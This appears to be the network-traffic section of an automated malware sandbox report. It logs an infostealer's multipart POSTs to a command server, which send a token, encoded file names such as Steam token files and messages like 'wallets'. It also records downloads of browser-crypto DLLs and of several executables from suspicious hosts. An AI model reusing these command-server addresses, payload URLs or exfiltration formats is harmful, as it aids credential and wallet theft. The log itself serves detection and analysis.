Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFIHost: 185.172.128.26Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 48 4e 6e 5a 32 56 6e 5a 57 63 75 5a 6d 6c 73 5a 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="file_name"ZHNnZ2VnZWcuZmlsZQ==------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="file"------IJKKEHJDHJKFIECAAKFI--
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/nss3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAHost: 185.172.128.26Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 185.172.128.26Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="message"wallets------FIECFBAAAFHIIDGCGCBF--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFIDHost: 185.172.128.26Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="message"files------HIEHDAFHDHCBFIDGCFID--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 56 54 53 31 78 61 55 31 4e 61 57 55 56 47 57 55 31 56 58 46 70 54 55 31 70 5a 52 55 5a 5a 54 56 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 57 6c 4e 54 57 6c 6c 46 52 6c 6c 4e 56 56 46 46 53 31 70 57 55 46 46 43 54 56 4e 48 57 6c 42 48 52 6b 70 54 56 46 42 57 53 31 4e 4c 53 31 6c 5a 54 30 70 4b 53 56 5a 4c 53 6c 4a 59 54 55 4a 45 51 30 31 4c 51 6b 35 54 57 45 56 61 54 31 6c 5a 54 45 78 44 56 6b 64 43 51 31 46 44 53 31 5a 56 55 31 68 49 54 46 52 55 54 46 4a 43 53 46 42 44 54 6c 4e 46 54 56 4a 53 54 30 74 43 57 45 5a 48 55 55 70 61 56 45 4a 42 56 6b 35 53 53 6b 70 52 51 6b 74 58 55 56 6c 58 53 55 35 56 56 45 52 58 57 46 56 4c 56 46 64 52 56 45 78 47 56 6b 74 52 53 6b 78 53 57 46 5a 47 54 55 4e 50 57 6c 4a 61 57 56 46 4b 53 30 4a 4a 56 46 70 50 54 6c 42 54 53 31 5a 47 57 55 64 57 52 6c 4a 59 51 6b 52 50 56 6c 6c 49 56 6b 56 4e 51 56 46 50 52 56 6c 4e 53 30 68 48 52 6b 6c 56 55 30 31 56 57 6b 5a 4d 53 31 4a 4c 51 6b 35 5a 52 6c 46 56 54 46 6c 42 55 31 46 4b 56 30 6c 4e 57 46 52 51 53 30 78 55 57 45 35 48 53 6b 56 58 54 56 5a 54 52 45 31 57 57 55 56 49 54 55 52 51 56 55 4a 58 53 46 68 4d 54 55 52 48 51 55 78 4a 56 45 5a 5a 54 31 42 4f 52 55 6c 52 55 31 70 4a 52 6c 52 52 56 6c 56 54 54 46 4a 4d 57 56 42 4c 55 6c 52 59 54 6b 74 51 57 6b 31 50 56 46 4e 47 54 55 4e 55 56 45 4e 42 55 6b 52 5a 56 46 5a 5a 53 6b 35 61 57 55 4a 5a 51 31 6c 47 52 55 31 58 56 30 74 44 53 45 31 50 56 45 56 61 56 56 52 44 55 6b 56 43 57 6c 42 4e 56 6b 4e 59 51 6c 6c 51 57 55 46 4f 52 56 4a 4e 52 30 6c 58 55 55 64 53 54 45 52 51 55 6b 70 46 56 56 4a 4a 56 46 4a 4a 53 45 56 55 54 56 6c 49 52 55 52 53 53 46 5a 61 56 30 4e 4e 52 45 68 4f 52 6b 5a 61 52 30 78 4c 53 30 70 52 52 30 4e 53 53 55 46 43 56 46 5a 50 54 31 4e 44 54 56 4a 45 54 55 4e 5a 51 6b 31 45 55 55 39 48 53 46 56 56 57 6b 6c 52 56 55 52 4a 52 31 64 4b 52 55 52 5a 55 30 6c 4d 51 55 78 52 51 6b 39
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCFHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDHHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDBHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIIIHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBFHost: 185.172.128.26Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIIDHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFIDHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHIHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.172.128.26Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 185.172.128.26Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="file"------KKJDGDHIDBGIECBGHJDB--
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.172.128.26Content-Length: 112059Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.172.128.26Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 65 67 77 65 67 67 77 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 2d 2d 0d 0a Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="message"egweggw------IDAKJKEHDBGHIDHIEHDB--
Source: global traffic	HTTP traffic detected: GET /Ledger-Live.exe HTTP/1.1Host: 185.172.128.65Cache-Control: no-cache

Source: unknown	DNS query: name: api.myip.com
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: HEAD /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: 294anacamptometer.sbsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: cybervincent.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ixef571134343/ef571134343/downloads/Start.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0a9ab821666277b5dd3929d09bffe743/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: kilojagger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0a9ab821666277b5dd3929d09bffe743/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: 294anacamptometer.sbsConnection: Keep-AliveCookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
Source: global traffic	HTTP traffic detected: GET /e14c6eb6-712a-4c2e-be84-37a1de2550e3/downloads/ddaff67e-23e9-45d6-b114-ae41de265d36/Start.exe?response-content-disposition=attachment%3B%20filename%3D%22Start.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAB3POAY3&Signature=3kDIIlaGVwgd2Exw7Puex%2FlGpQo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQDhHqaiQO5ftJoYENXqYI3qOUsxKtJmtL5TyDU8XRCQpgIhALTEr1oPjk5GlozLK44TJQxo2B9PWb3F8vt9A66nptTFKrACCNH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzjabjAh4jtdqFTXO8qhAKc%2FJCUi8r7C2rKpJ6nTOBKVhhNuTfp0qyzeYXq3z5zb1SOBopYqoPnADE6EcT5B63SdEanUmptHSjNoRDCfbaJATgqQMr2zoj8W7o%2BLo3H4Zg7DvK%2Fh3CfkFJIe3eIDeK5ugIsMz3MnRS9bNVX%2BcnAmrcAh%2BLT0z9IvvAxRjvFzYyLF%2FjD3GZJp1E2ykbjBzBreBe4mJ8QG%2FpJRnNX%2FzBOVs16I6JWDVjjNvkEjrr88qyKsqOC%2Bkq0Zql9hqo2bUEqWZB5IYTIBgns0vp2SnzyrfrU4EYav2Ocri113OUEwF%2BuqrzzIbJVlFlU%2BDZaiZ3JnC%2F8fsZb26UgILl75oPvRz55yTDWypSwBjqcAUsNXCnm%2F1yH8Tt9PM2FrdznncEhI8VB3%2FUWYkOw78tlqOIqDRNWTLh1OCJMAeCnMcCqejljL%2FrkTEa%2BDm%2Bbl4DnM9S%2BFv1NUD3keKurkqOpub1OaR34rpEANOAiBrWsHoegfz6J2mZQrWsZPo%2FVAtv9i0X472Wr4oV5dwAK6OvyCX4xw8dKzr2mFblnik%2FDvWIBi5kNW73qgBolRA%3D%3D&Expires=1711615070 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: d.392391234.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676251329?hash=gdEXjFzqP4Hz4RjHrC6Ryb5BsQH3gXEoTcWHcSEbfh0&dl=n9WfEp2Oq35MoZGAEeTjZMvNYQeUp1Xgpi7NCn4nnYD&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdBUKrCPj7fUCgfOWpgDFGrhD5rBE6MQvUIUlHz&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
